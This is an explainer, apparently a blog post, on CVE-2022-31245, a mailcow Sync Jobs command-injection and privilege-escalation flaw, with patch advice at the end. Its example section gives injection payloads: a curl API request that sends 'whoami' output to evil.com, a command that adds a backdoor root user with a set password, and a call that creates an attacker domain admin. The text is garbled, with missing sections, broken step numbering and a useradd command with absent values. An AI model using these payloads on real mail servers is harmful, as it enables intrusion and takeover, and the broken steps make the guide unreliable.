CVE-2022-31245 - Critical mailcow RCE & Privilege Escalation via Sync Jobs (`--debug` + `---PIPEMESS`) - Explained with Examples

CVE-2022-31245 is a high-severity Remote Code Execution (RCE) and privilege escalation vulnerability discovered in mailcow, a popular open-source email server suite. The flaw affects mailcow instances released before May 2022. Malicious users with basic account access can escalate rights to domain admin by injecting OS commands through specially crafted Sync Job options.

Let's break this down in simple terms, show proof-of-concept code, and offer real-world context so you understand the impact—even if you're not a security pro.

1. What is mailcow and the Vulnerability?

mailcow is a widely used mail server based on Docker. It lets admins manage domains, users, and mailboxes—perfect for small to medium businesses who want full control over email.

The bug:

In the “Sync Jobs” admin panel, mailcow supports options for the dovecot-sync tool.

- If an authenticated (non-admin) user creates or edits a Sync Job, they can pass arbitrary arguments using the --debug and ---PIPEMESS options.
- These parameters are passed directly to a shell and not properly sanitized, opening the door for command injection.

This bug is tracked as CVE-2022-31245.

Create or Edit a Sync Job: Navigate to the Sync Jobs page and add a new job.

3. Inject Command: In the options field (intended for dovecot-sync CLI arguments), attacker enters a payload abusing --debug and ---PIPEMESS.
4. Trigger Execution: When the Sync Job runs, mailcow starts a shell command with these arguments. Exploit payload is executed as the system user (often with high privileges).
5. Privilege Escalation: Poisoned command can create a new domain admin or run arbitrary OS commands.

3. Example Exploit

Suppose the Sync Job options allow you to supply --debug and ---PIPEMESS. Here’s what that might look like from the web UI or API:

--debug ; id ;# ---PIPEMESS

Save and trigger the Sync Job.

5. Check logs or controlled output: If whoami output appears (e.g., as root), the exploit is successful.

Suppose mailcow has an API (authenticated cookie/session required)

curl -k -X POST https://mailcow.example.com/api/v1/add/syncjob \
-H "Authorization: Bearer $TOKEN" \
-d '{
  "host": "attackerhost",
  "options": "--debug ; bash -c \"curl http://evil.com/\$(whoami)\"; ;# ---PIPEMESS"
}'

This pings the attacker's server, disclosing the user context running the job.

Backdoor admin user via shell command

--debug ; useradd -ou  -g  attacker ; echo attacker:password | chpasswd ;# ---PIPEMESS

This creates a new OS-level root user.

Direct privilege escalation (adding yourself as domain admin via mailcow CLI)

--debug ; php /mailcow/scripts/create_user.php --admin attacker@domain.local --password mypass ;# ---PIPEMESS

5. Why Was This Possible?

- The Sync Jobs interface didn't sanitize/validate input.

Admins often overlook options fields for users, making this more dangerous.

## 6. How to Fix / What To Do

- Upgrade mailcow: Patch released in May 2022
- Restrict Sync Job access: Don’t allow untrusted users to create/edit jobs.
- Sanitize input: Ensure all CLI arguments are properly escaped or not usable for direct shell calling.

7. References

- NVD Entry: CVE-2022-31245
- mailcow Issue and Patch
- mailcow Official Site

8. Summary

CVE-2022-31245 is a critical bug that could let ordinary mailcow users run system commands and escalate to admin, simply by crafting malicious options in a Sync Job. If you run mailcow, patch right now—or risk a total server compromise.

Questions about your exposure?  
Check your logs for non-admin users creating sync jobs with unusual options, and enforce updates on your mail server infrastructure.

Stay safe and patch often!

*(This write-up is original and for educational purposes. Always act with proper authorization!)*

Timeline

Published on: 05/20/2022 15:15:00 UTC
Last modified on: 06/02/2022 16:59:00 UTC